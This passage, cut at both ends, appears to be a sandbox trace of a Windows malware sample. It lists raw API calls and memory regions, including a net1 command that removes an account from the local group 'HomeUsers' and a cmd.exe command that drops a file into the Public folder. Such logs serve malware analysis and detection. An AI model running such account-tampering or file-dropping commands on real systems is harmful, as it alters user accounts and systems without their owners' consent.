_String2="HomeUsers") returned -5 [0228.720] _wcsicmp (_String1="cont", _String2="HomeUsers") returned -5 [0228.720] _wcsicmp (_String1="file", _String2="HomeUsers") returned -2 [0228.720] _wcsicmp (_String1="files", _String2="HomeUsers") returned -2 [0228.720] _wcsicmp (_String1="group", _String2="HomeUsers") returned -1 [0228.720] _wcsicmp (_String1="groups", _String2="HomeUsers") returned -1 [0228.720] _wcsicmp (_String1="help", _String2="HomeUsers") returned -10 [0228.720] _wcsicmp (_String1="helpmsg", _String2="HomeUsers") returned -10 [0228.720] _wcsicmp (_String1="localgroup", _String2="HomeUsers") returned 4 [0228.720] _wcsicmp (_String1="pause", _String2="HomeUsers") returned 8 [0228.721] _wcsicmp (_String1="session", _String2="HomeUsers") returned 11 [0228.721] _wcsicmp (_String1="sessions", _String2="HomeUsers") returned 11 [0228.721] _wcsicmp (_String1="sess", _String2="HomeUsers") returned 11 [0228.721] _wcsicmp (_String1="share", _String2="HomeUsers") returned 11 [0228.721] _wcsicmp (_String1="start", _String2="HomeUsers") returned 11 [0228.721] _wcsicmp (_String1="stats", _String2="HomeUsers") returned 11 [0228.721] _wcsicmp (_String1="statistics", _String2="HomeUsers") returned 11 [0228.721] _wcsicmp (_String1="stop", _String2="HomeUsers") returned 11 [0228.721] _wcsicmp (_String1="time", _String2="HomeUsers") returned 12 [0228.721] _wcsicmp (_String1="user", _String2="HomeUsers") returned 13 [0228.721] _wcsicmp (_String1="users", _String2="HomeUsers") returned 13 [0228.721] _wcsicmp (_String1="msg", _String2="HomeUsers") returned 5 [0228.721] _wcsicmp (_String1="messenger", _String2="HomeUsers") returned 5 [0228.721] _wcsicmp (_String1="receiver", _String2="HomeUsers") returned 10 [0228.721] _wcsicmp (_String1="rcv", _String2="HomeUsers") returned 10 [0228.721] _wcsicmp (_String1="netpopup", _String2="HomeUsers") returned 6 [0228.721] _wcsicmp (_String1="redirector", _String2="HomeUsers") returned 10 [0228.721] _wcsicmp (_String1="redir", _String2="HomeUsers") returned 10 [0228.721] _wcsicmp (_String1="rdr", _String2="HomeUsers") returned 10 [0228.721] _wcsicmp (_String1="workstation", _String2="HomeUsers") returned 15 [0228.721] _wcsicmp (_String1="work", _String2="HomeUsers") returned 15 [0228.721] _wcsicmp (_String1="wksta", _String2="HomeUsers") returned 15 [0228.721] _wcsicmp (_String1="prdr", _String2="HomeUsers") returned 8 [0228.721] _wcsicmp (_String1="devrdr", _String2="HomeUsers") returned -4 [0228.721] _wcsicmp (_String1="lanmanworkstation", _String2="HomeUsers") returned 4 [0228.721] _wcsicmp (_String1="server", _String2="HomeUsers") returned 11 [0228.721] _wcsicmp (_String1="svr", _String2="HomeUsers") returned 11 [0228.721] _wcsicmp (_String1="srv", _String2="HomeUsers") returned 11 [0228.721] _wcsicmp (_String1="lanmanserver", _String2="HomeUsers") returned 4 [0228.721] _wcsicmp (_String1="alerter", _String2="HomeUsers") returned -7 [0228.722] _wcsicmp (_String1="netlogon", _String2="HomeUsers") returned 6 [0228.722] _wcsupr (in: _String="/delete" | out: _String="/DELETE") returned="/DELETE" [0228.722] wcscspn (_String="/DELETE", _Control=":") returned 0x7 [0228.722] wcscspn (_String="/DELETE", _Control=":") returned 0x7 [0228.722] wcsncmp (_String1="/DELETE", _String2="/DELETE", _MaxCount=0x7) returned 0 [0228.722] _wcsicmp (_String1="accounts", _String2="DSsDPMx042") returned -3 [0228.722] _wcsicmp (_String1="computer", _String2="DSsDPMx042") returned -1 [0228.722] _wcsicmp (_String1="config", _String2="DSsDPMx042") returned -1 [0228.722] _wcsicmp (_String1="continue", _String2="DSsDPMx042") returned -1 [0228.722] _wcsicmp (_String1="cont", _String2="DSsDPMx042") returned -1 [0228.722] _wcsicmp (_String1="file", _String2="DSsDPMx042") returned 2 [0228.722] _wcsicmp (_String1="files", _String2="DSsDPMx042") returned 2 [0228.722] _wcsicmp (_String1="group", _String2="DSsDPMx042") returned 3 [0228.722] _wcsicmp (_String1="groups", _String2="DSsDPMx042") returned 3 [0228.722] _wcsicmp (_String1="help", _String2="DSsDPMx042") returned 4 [0228.722] _wcsicmp (_String1="helpmsg", _String2="DSsDPMx042") returned 4 [0228.722] _wcsicmp (_String1="localgroup", _String2="DSsDPMx042") returned 8 [0228.722] _wcsicmp (_String1="pause", _String2="DSsDPMx042") returned 12 [0228.722] _wcsicmp (_String1="session", _String2="DSsDPMx042") returned 15 [0228.722] _wcsicmp (_String1="sessions", _String2="DSsDPMx042") returned 15 [0228.722] _wcsicmp (_String1="sess", _String2="DSsDPMx042") returned 15 [0228.722] _wcsicmp (_String1="share", _String2="DSsDPMx042") returned 15 [0228.722] _wcsicmp (_String1="start", _String2="DSsDPMx042") returned 15 [0228.723] _wcsicmp (_String1="stats", _String2="DSsDPMx042") returned 15 [0228.723] _wcsicmp (_String1="statistics", _String2="DSsDPMx042") returned 15 [0228.723] _wcsicmp (_String1="stop", _String2="DSsDPMx042") returned 15 [0228.723] _wcsicmp (_String1="time", _String2="DSsDPMx042") returned 16 [0228.723] _wcsicmp (_String1="user", _String2="DSsDPMx042") returned 17 [0228.723] _wcsicmp (_String1="users", _String2="DSsDPMx042") returned 17 [0228.723] _wcsicmp (_String1="msg", _String2="DSsDPMx042") returned 9 [0228.723] _wcsicmp (_String1="messenger", _String2="DSsDPMx042") returned 9 [0228.723] _wcsicmp (_String1="receiver", _String2="DSsDPMx042") returned 14 [0228.723] _wcsicmp (_String1="rcv", _String2="DSsDPMx042") returned 14 [0228.723] _wcsicmp (_String1="netpopup", _String2="DSsDPMx042") returned 10 [0228.723] _wcsicmp (_String1="redirector", _String2="DSsDPMx042") returned 14 [0228.723] _wcsicmp (_String1="redir", _String2="DSsDPMx042") returned 14 [0228.723] _wcsicmp (_String1="rdr", _String2="DSsDPMx042") returned 14 [0228.723] _wcsicmp (_String1="workstation", _String2="DSsDPMx042") returned 19 [0228.723] _wcsicmp (_String1="work", _String2="DSsDPMx042") returned 19 [0228.723] _wcsicmp (_String1="wksta", _String2="DSsDPMx042") returned 19 [0228.723] _wcsicmp (_String1="prdr", _String2="DSsDPMx042") returned 12 [0228.723] _wcsicmp (_String1="devrdr", _String2="DSsDPMx042") returned -14 [0228.723] _wcsicmp (_String1="lanmanworkstation", _String2="DSsDPMx042") returned 8 [0228.723] _wcsicmp (_String1="server", _String2="DSsDPMx042") returned 15 [0228.723] _wcsicmp (_String1="svr", _String2="DSsDPMx042") returned 15 [0228.723] _wcsicmp (_String1="srv", _String2="DSsDPMx042") returned 15 [0228.723] _wcsicmp (_String1="lanmanserver", _String2="DSsDPMx042") returned 8 [0228.723] _wcsicmp (_String1="alerter", _String2="DSsDPMx042") returned -3 [0228.723] _wcsicmp (_String1="netlogon", _String2="DSsDPMx042") returned 10 [0228.723] NetpwNameValidate () returned 0x0 [0228.724] NetpwNameValidate () returned 0x0 [0228.724] wcscpy_s (in: _Destination=0xcfb00, _SizeInWords=0x111, _Source="DSsDPMx042" | out: _Destination="DSsDPMx042") returned 0x0 [0228.724] NetpwNameValidate () returned 0x0 [0228.724] wcscspn (_String="/DELETE", _Control=":") returned 0x7 [0228.724] wcscspn (_String="/DELETE", _Control=":") returned 0x7 [0228.724] wcsncmp (_String1="/DELETE", _String2="/DELETE", _MaxCount=0x7) returned 0 [0228.725] wcscspn (_String="/DELETE", _Control=":") returned 0x7 [0228.725] wcsncmp (_String1="/DOMAIN", _String2="/DELETE", _MaxCount=0x7) returned 10 [0228.725] DsRoleGetPrimaryDomainInformation () returned 0x0 [0228.777] wcscpy_s (in: _Destination=0xcfb3c, _SizeInWords=0x105, _Source="" | out: _Destination="") returned 0x0 [0228.777] DsRoleFreeMemory () returned 0x0 [0228.777] LsaOpenPolicy () returned 0x0 [0228.778] LsaQueryInformationPolicy () returned 0x0 [0228.778] SamConnect () returned 0x0 [0228.779] GetLengthSid (pSid=0x2c3f78) returned 0x18 [0228.780] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xa91ae4 | out: Buffer=0xa91ae4*=0x2c8d88) returned 0x0 [0228.780] CopySid (in: nDestinationSidLength=0x18, pDestinationSid=0x2c8d88, pSourceSid=0x2c3f78 | out: pDestinationSid=0x2c8d88) returned 1 [0228.780] SamOpenDomain () returned 0x0 [0228.780] RtlLengthRequiredSid (SubAuthorityCount=0x1) returned 0xc [0228.780] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2c6568 [0228.780] RtlInitializeSid (in: Sid=0x2c6568, IdentifierAuthority=0xa91784, SubAuthorityCount=0x1 | out: Sid=0x2c6568) returned 0x0 [0228.780] RtlSubAuthoritySid (Sid=0x2c6568, SubAuthority=0x0) returned 0x2c6570 [0228.780] RtlLengthRequiredSid (SubAuthorityCount=0x1) returned 0xc [0228.780] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2c6580 [0228.780] RtlInitializeSid (in: Sid=0x2c6580, IdentifierAuthority=0xa91794, SubAuthorityCount=0x1 | out: Sid=0x2c6580) returned 0x0 [0228.780] RtlSubAuthoritySid (Sid=0x2c6580, SubAuthority=0x0) returned 0x2c6588 [0228.780] RtlLengthRequiredSid (SubAuthorityCount=0x1) returned 0xc [0228.780] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2c6598 [0228.780] RtlInitializeSid (in: Sid=0x2c6598, IdentifierAuthority=0xa917a4, SubAuthorityCount=0x1 | out: Sid=0x2c6598) returned 0x0 [0228.780] RtlSubAuthoritySid (Sid=0x2c6598, SubAuthority=0x0) returned 0x2c65a0 [0228.780] RtlLengthRequiredSid (SubAuthorityCount=0x1) returned 0xc [0228.780] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2c65b0 [0228.780] RtlInitializeSid (in: Sid=0x2c65b0, IdentifierAuthority=0xa917b4, SubAuthorityCount=0x1 | out: Sid=0x2c65b0) returned 0x0 [0228.780] RtlSubAuthoritySid (Sid=0x2c65b0, SubAuthority=0x0) returned 0x2c65b8 [0228.780] RtlLengthRequiredSid (SubAuthorityCount=0x1) returned 0xc [0228.780] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2c65c8 [0228.781] RtlInitializeSid (in: Sid=0x2c65c8, IdentifierAuthority=0xa917c4, SubAuthorityCount=0x1 | out: Sid=0x2c65c8) returned 0x0 [0228.781] RtlSubAuthoritySid (Sid=0x2c65c8, SubAuthority=0x0) returned 0x2c65d0 [0228.781] RtlLengthRequiredSid (SubAuthorityCount=0x1) returned 0xc [0228.781] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2c65e0 [0228.781] RtlInitializeSid (in: Sid=0x2c65e0, IdentifierAuthority=0xa917d4, SubAuthorityCount=0x1 | out: Sid=0x2c65e0) returned 0x0 [0228.781] RtlSubAuthoritySid (Sid=0x2c65e0, SubAuthority=0x0) returned 0x2c65e8 [0228.781] RtlLengthRequiredSid (SubAuthorityCount=0x1) returned 0xc [0228.781] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2c65f8 [0228.781] RtlInitializeSid (in: Sid=0x2c65f8, IdentifierAuthority=0xa917e4, SubAuthorityCount=0x1 | out: Sid=0x2c65f8) returned 0x0 [0228.781] RtlSubAuthoritySid (Sid=0x2c65f8, SubAuthority=0x0) returned 0x2c6600 [0228.781] RtlLengthRequiredSid (SubAuthorityCount=0x1) returned 0xc [0228.781] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2c6610 [0228.781] RtlInitializeSid (in: Sid=0x2c6610, IdentifierAuthority=0xa917f4, SubAuthorityCount=0x1 | out: Sid=0x2c6610) returned 0x0 [0228.781] RtlSubAuthoritySid (Sid=0x2c6610, SubAuthority=0x0) returned 0x2c6618 [0228.781] RtlLengthRequiredSid (SubAuthorityCount=0x1) returned 0xc [0228.781] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2c6628 [0228.781] RtlInitializeSid (in: Sid=0x2c6628, IdentifierAuthority=0xa91804, SubAuthorityCount=0x1 | out: Sid=0x2c6628) returned 0x0 [0228.781] RtlSubAuthoritySid (Sid=0x2c6628, SubAuthority=0x0) returned 0x2c6630 [0228.781] RtlLengthRequiredSid (SubAuthorityCount=0x1) returned 0xc [0228.781] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2c6640 [0228.781] RtlInitializeSid (in: Sid=0x2c6640, IdentifierAuthority=0xa91814, SubAuthorityCount=0x1 | out: Sid=0x2c6640) returned 0x0 [0228.781] RtlSubAuthoritySid (Sid=0x2c6640, SubAuthority=0x0) returned 0x2c6648 [0228.781] RtlSubAuthorityCountSid (Sid=0x2c65e0) returned 0x2c65e1 [0228.781] RtlLengthRequiredSid (SubAuthorityCount=0x2) returned 0x10 [0228.781] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2c6658 [0228.781] RtlCopySid (DestinationSidLength=0x10, DestinationSid=0x2c6658, SourceSid=0x2c65e0) returned 0x0 [0228.781] RtlSubAuthorityCountSid (Sid=0x2c6658) returned 0x2c6659 [0228.781] RtlSubAuthoritySid (Sid=0x2c6658, SubAuthority=0x1) returned 0x2c6664 [0228.781] RtlSubAuthorityCountSid (Sid=0x2c65e0) returned 0x2c65e1 [0228.781] RtlLengthRequiredSid (SubAuthorityCount=0x2) returned 0x10 [0228.781] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2c6670 [0228.781] RtlCopySid (DestinationSidLength=0x10, DestinationSid=0x2c6670, SourceSid=0x2c65e0) returned 0x0 [0228.781] RtlSubAuthorityCountSid (Sid=0x2c6670) returned 0x2c6671 [0228.782] RtlSubAuthoritySid (Sid=0x2c6670, SubAuthority=0x1) returned 0x2c667c [0228.782] RtlSubAuthorityCountSid (Sid=0x2c65e0) returned 0x2c65e1 [0228.782] RtlLengthRequiredSid (SubAuthorityCount=0x2) returned 0x10 [0228.782] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2c6688 [0228.782] RtlCopySid (DestinationSidLength=0x10, DestinationSid=0x2c6688, SourceSid=0x2c65e0) returned 0x0 [0228.782] RtlSubAuthorityCountSid (Sid=0x2c6688) returned 0x2c6689 [0228.782] RtlSubAuthoritySid (Sid=0x2c6688, SubAuthority=0x1) returned 0x2c6694 [0228.782] RtlSubAuthorityCountSid (Sid=0x2c65e0) returned 0x2c65e1 [0228.782] RtlLengthRequiredSid (SubAuthorityCount=0x2) returned 0x10 [0228.782] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2c66a0 [0228.782] RtlCopySid (DestinationSidLength=0x10, DestinationSid=0x2c66a0, SourceSid=0x2c65e0) returned 0x0 [0228.782] RtlSubAuthorityCountSid (Sid=0x2c66a0) returned 0x2c66a1 [0228.782] RtlSubAuthoritySid (Sid=0x2c66a0, SubAuthority=0x1) returned 0x2c66ac [0228.782] RtlSubAuthorityCountSid (Sid=0x2c65e0) returned 0x2c65e1 [0228.782] RtlLengthRequiredSid (SubAuthorityCount=0x2) returned 0x10 [0228.782] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2c66b8 [0228.782] RtlCopySid (DestinationSidLength=0x10, DestinationSid=0x2c66b8, SourceSid=0x2c65e0) returned 0x0 [0228.782] RtlSubAuthorityCountSid (Sid=0x2c66b8) returned 0x2c66b9 [0228.782] RtlSubAuthoritySid (Sid=0x2c66b8, SubAuthority=0x1) returned 0x2c66c4 [0228.782] RtlSubAuthorityCountSid (Sid=0x2c65e0) returned 0x2c65e1 [0228.782] RtlLengthRequiredSid (SubAuthorityCount=0x2) returned 0x10 [0228.782] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2c66d0 [0228.782] RtlCopySid (DestinationSidLength=0x10, DestinationSid=0x2c66d0, SourceSid=0x2c65e0) returned 0x0 [0228.782] RtlSubAuthorityCountSid (Sid=0x2c66d0) returned 0x2c66d1 [0228.782] RtlSubAuthoritySid (Sid=0x2c66d0, SubAuthority=0x1) returned 0x2c66dc [0228.782] RtlSubAuthorityCountSid (Sid=0x2c65e0) returned 0x2c65e1 [0228.782] RtlLengthRequiredSid (SubAuthorityCount=0x2) returned 0x10 [0228.782] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2c66e8 [0228.782] RtlCopySid (DestinationSidLength=0x10, DestinationSid=0x2c66e8, SourceSid=0x2c65e0) returned 0x0 [0228.782] RtlSubAuthorityCountSid (Sid=0x2c66e8) returned 0x2c66e9 [0228.782] RtlSubAuthoritySid (Sid=0x2c66e8, SubAuthority=0x1) returned 0x2c66f4 [0228.782] RtlSubAuthorityCountSid (Sid=0x2c65e0) returned 0x2c65e1 [0228.782] RtlLengthRequiredSid (SubAuthorityCount=0x2) returned 0x10 [0228.782] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2c6700 [0228.783] RtlCopySid (DestinationSidLength=0x10, DestinationSid=0x2c6700, SourceSid=0x2c65e0) returned 0x0 [0228.783] RtlSubAuthorityCountSid (Sid=0x2c6700) returned 0x2c6701 [0228.783] RtlSubAuthoritySid (Sid=0x2c6700, SubAuthority=0x1) returned 0x2c670c [0228.783] RtlSubAuthorityCountSid (Sid=0x2c65e0) returned 0x2c65e1 [0228.783] RtlLengthRequiredSid (SubAuthorityCount=0x2) returned 0x10 [0228.783] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2c6718 [0228.783] RtlCopySid (DestinationSidLength=0x10, DestinationSid=0x2c6718, SourceSid=0x2c65e0) returned 0x0 [0228.783] RtlSubAuthorityCountSid (Sid=0x2c6718) returned 0x2c6719 [0228.783] RtlSubAuthoritySid (Sid=0x2c6718, SubAuthority=0x1) returned 0x2c6724 [0228.783] SamOpenDomain () returned 0x0 [0228.783] LsaFreeMemory () returned 0x0 [0228.783] SamCloseHandle () returned 0x0 [0228.783] SamLookupNamesInDomain () returned 0xc0000073 [0228.784] SamLookupNamesInDomain () returned 0xc0000073 [0228.784] NetApiBufferAllocate (in: ByteCount=0x20a, Buffer=0xcfaf0 | out: Buffer=0xcfaf0*=0x2c9cd0) returned 0x0 [0228.784] GetComputerNameExW (in: NameType=0x2, lpBuffer=0x2c9cd0, nSize=0xcfae0 | out: lpBuffer="", nSize=0xcfae0) returned 1 [0228.784] LsaLookupNames () returned 0x0 [0228.788] LsaLookupNames () returned 0xc0000073 [0228.788] LsaFreeMemory () returned 0x0 [0228.788] LsaFreeMemory () returned 0x0 [0228.788] LsaFreeMemory () returned 0x0 [0228.788] LsaFreeMemory () returned 0x0 [0228.788] NetApiBufferFree (Buffer=0x2c9cd0) returned 0x0 [0228.788] SamCloseHandle () returned 0x0 [0228.788] SamCloseHandle () returned 0x0 [0228.789] LsaClose () returned 0x0 [0228.789] NetApiBufferFree (Buffer=0x2c8d88) returned 0x0 [0228.789] LocalFree (hMem=0x2c6568) returned 0x0 [0228.789] LocalFree (hMem=0x2c6580) returned 0x0 [0228.789] LocalFree (hMem=0x2c6598) returned 0x0 [0228.789] LocalFree (hMem=0x2c65b0) returned 0x0 [0228.789] LocalFree (hMem=0x2c65c8) returned 0x0 [0228.789] LocalFree (hMem=0x2c65e0) returned 0x0 [0228.789] LocalFree (hMem=0x2c65f8) returned 0x0 [0228.789] LocalFree (hMem=0x2c6610) returned 0x0 [0228.789] LocalFree (hMem=0x2c6628) returned 0x0 [0228.789] LocalFree (hMem=0x2c6640) returned 0x0 [0228.789] LocalFree (hMem=0x2c6658) returned 0x0 [0228.789] LocalFree (hMem=0x2c6670) returned 0x0 [0228.789] LocalFree (hMem=0x2c6688) returned 0x0 [0228.789] LocalFree (hMem=0x2c66a0) returned 0x0 [0228.789] LocalFree (hMem=0x2c66b8) returned 0x0 [0228.789] LocalFree (hMem=0x2c66d0) returned 0x0 [0228.789] LocalFree (hMem=0x2c66e8) returned 0x0 [0228.789] LocalFree (hMem=0x2c6700) returned 0x0 [0228.789] LocalFree (hMem=0x2c6718) returned 0x0 [0228.789] _ultow (in: _Dest=0x560, _Radix=850588 | out: _Dest=0x560) returned="1376" [0228.790] wcscpy_s (in: _Destination=0xa8a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0228.790] LoadLibraryW (lpLibFileName="NETMSG") returned 0x6c3c0000 [0228.811] FormatMessageW (in: dwFlags=0x2800, lpSource=0x6c3c0000, dwMessageId=0xdae, dwLanguageId=0x0, lpBuffer=0xa8b338, nSize=0x800, Arguments=0xa89dd8 | out: lpBuffer="System error 1376 has occurred.\r\n") returned 0x21 [0228.813] GetFileType (hFile=0xb) returned 0x2 [0228.813] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfa50 | out: lpMode=0xcfa50) returned 1 [0228.813] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xa8b338*, nNumberOfCharsToWrite=0x21, lpNumberOfCharsWritten=0xcfa70, lpReserved=0x0 | out: lpBuffer=0xa8b338*, lpNumberOfCharsWritten=0xcfa70*=0x21) returned 1 [0228.813] GetFileType (hFile=0xb) returned 0x2 [0228.814] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfa50 | out: lpMode=0xcfa50) returned 1 [0228.814] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xa716cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcfa70, lpReserved=0x0 | out: lpBuffer=0xa716cc*, lpNumberOfCharsWritten=0xcfa70*=0x2) returned 1 [0228.814] FormatMessageW (in: dwFlags=0x3000, lpSource=0x6c3c0000, dwMessageId=0x560, dwLanguageId=0x0, lpBuffer=0xa8b338, nSize=0x800, Arguments=0xa89dac | out: lpBuffer="The specified local group does not exist.\r\n") returned 0x2b [0228.833] GetFileType (hFile=0xb) returned 0x2 [0228.833] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfa50 | out: lpMode=0xcfa50) returned 1 [0228.833] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xa8b338*, nNumberOfCharsToWrite=0x2b, lpNumberOfCharsWritten=0xcfa70, lpReserved=0x0 | out: lpBuffer=0xa8b338*, lpNumberOfCharsWritten=0xcfa70*=0x2b) returned 1 [0228.833] GetFileType (hFile=0xb) returned 0x2 [0228.834] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfa50 | out: lpMode=0xcfa50) returned 1 [0228.834] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xa716cc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcfa70, lpReserved=0x0 | out: lpBuffer=0xa716cc*, lpNumberOfCharsWritten=0xcfa70*=0x2) returned 1 [0228.835] NetApiBufferFree (Buffer=0x2be540) returned 0x0 [0228.835] NetApiBufferFree (Buffer=0x2be558) returned 0x0 [0228.835] GetCommandLineW () returned="C:\\Windows\\system32\\net1 localgroup HomeUsers /delete DSsDPMx042" [0228.835] exit (_Code=2) Thread: id = 111 os_tid = 0x668 Thread: id = 112 os_tid = 0x664 Process: id = "11" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7f09e5a0" os_pid = "0x69c" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x494" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /k echo a > \"C:\\Users\\Public\\N3Eg\\uc\"" cur_dir = "C:\\Windows\\system32\\" Region: id = 1260 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1261 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1262 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1263 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1264 start_va = 0x4a810000 end_va = 0x4a85bfff entry_point = 0x4a81829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" Region: id = 1265 start_va = 0x77200000 end_va = 0x7733bfff entry_point = 0x77200000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 1266 start_va = 0x77440000 end_va = 0x77440fff entry_point = 0x77440000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 1267 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1268 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1269 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1280 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1281 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1282 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 1283 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1284 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1285 start_va = 0x6dd80000 end_va = 0x6dd86fff entry_point = 0x6dd81230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" Region: id = 1286 start_va = 0x75510000 end_va = 0x75559fff entry_point = 0x75517de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 1287 start_va = 0x75900000 end_va = 0x759d3fff entry_point = 0x7594bde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 1288 start_va = 0x76ca0000 end_va = 0x76d68fff entry_point = 0x76cbd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 1289 start_va = 0x76dd0000 end_va = 0x76e1dfff entry_point = 0x76dd9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 1290 start_va = 0x76f70000 end_va = 0x7701bfff entry_point = 0x76f7a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 1291 start_va = 0x77020000 end_va = 0x770bcfff entry_point = 0x77053fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 1292 start_va = 0x77350000 end_va = 0x77359fff entry_point = 0x7735136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 1293 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1294 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1295 start_va = 0x75830000 end_va = 0x758fbfff entry_point = 0x7583168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 1296 start_va = 0x76630000 end_va = 0x7664efff entry_point = 0x76631355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 1297 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1298 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1299 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 1300 start_va = 0x3c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 1301 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1302 start_va = 0x510000 end_va = 0x110ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1303 start_va = 0x1110000 end_va = 0x139afff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001110000" filename = "" Thread: id = 114 os_tid = 0x9cc [0229.190] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fe74 | out: lpSystemTimeAsFileTime=0x12fe74*(dwLowDateTime=0xe37abba0, dwHighDateTime=0x1d204ef)) [0229.190] GetCurrentProcessId () returned 0x69c [0229.190] GetCurrentThreadId () returned 0x9cc [0229.190] GetTickCount () returned 0x409c0 [0229.190] QueryPerformanceCounter (in: lpPerformanceCount=0x12fe6c | out: lpPerformanceCount=0x12fe6c*=16438686010421) returned 1 [0229.191] GetModuleHandleA (lpModuleName=0x0) returned 0x4a810000 [0229.191] __set_app_type (_Type=0x1) [0229.191] __p__fmode () returned 0x770131f4 [0229.191] __p__commode () returned 0x770131fc [0229.191] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8321a6) returned 0x0 [0229.191] __getmainargs (in: _Argc=0x4a834238, _Argv=0x4a834240, _Env=0x4a83423c, _DoWildCard=0, _StartInfo=0x4a834140 | out: _Argc=0x4a834238, _Argv=0x4a834240, _Env=0x4a83423c) returned 0 [0229.192] GetCurrentThreadId () returned 0x9cc [0229.192] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9cc) returned 0x38 [0229.192] 